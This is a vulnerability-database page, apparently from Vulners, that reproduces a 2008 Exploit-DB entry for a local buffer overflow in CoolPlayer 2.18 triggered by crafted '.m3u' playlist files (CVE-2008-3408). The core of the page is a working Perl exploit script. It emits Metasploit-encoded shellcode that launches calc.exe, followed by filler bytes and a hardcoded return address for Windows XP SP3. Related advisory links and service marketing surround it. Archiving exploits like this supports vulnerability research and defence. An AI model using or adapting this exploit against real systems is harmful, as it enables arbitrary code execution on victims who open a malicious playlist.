Lucene search
+L

CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow

🗓️ 29 Jul 2008 00:00:00Reported by Guido LandiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

CoolPlayer 2.18 '.m3u' File Local Buffer Overflow - Perl Scrip

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-3408
29 Jul 200800:00
circl
checkpoint_advisories
Check Point Advisories
CoolPlayer Playlist File Handling Buffer Overflow (CVE-2008-3408)
22 Aug 201000:00
checkpoint_advisories
cve
CVE
CVE-2008-3408
31 Jul 200817:00
cve
cvelist
Cvelist
CVE-2008-3408
31 Jul 200817:00
cvelist
exploitdb
Exploit DB
CoolPlayer 2.18 - M3U Playlist Buffer Overflow
22 Dec 200900:00
exploitdb
exploitdb
Exploit DB
CoolPlayer 2.18 - DEP Bypass
2 Jan 201100:00
exploitdb
nvd
NVD
CVE-2008-3408
31 Jul 200817:41
nvd
prion
Prion
Stack overflow
31 Jul 200817:41
prion
prion
Prion
Stack overflow
27 Apr 200918:00
prion
saint
Saint
CoolPlayer m3u playlist processing filename buffer overflow
13 Aug 200800:00
saint
Rows per page
#!/usr/bin/perl
# k`sOSe - 07/29/2008

use warnings;
use strict;

# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
		"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
		"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
		"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
		"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
		"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
		"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
		"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
		"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
		"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
		"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
		"\x1e\x28\x44\xd4";

print	$shellcode	.
	"\x41" x (218 - length($shellcode)) .
	"\x32\x4c\x3c\x7e" ; # call ebx  user32.dll  winxp sp3

# milw0rm.com [2008-07-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.09665
39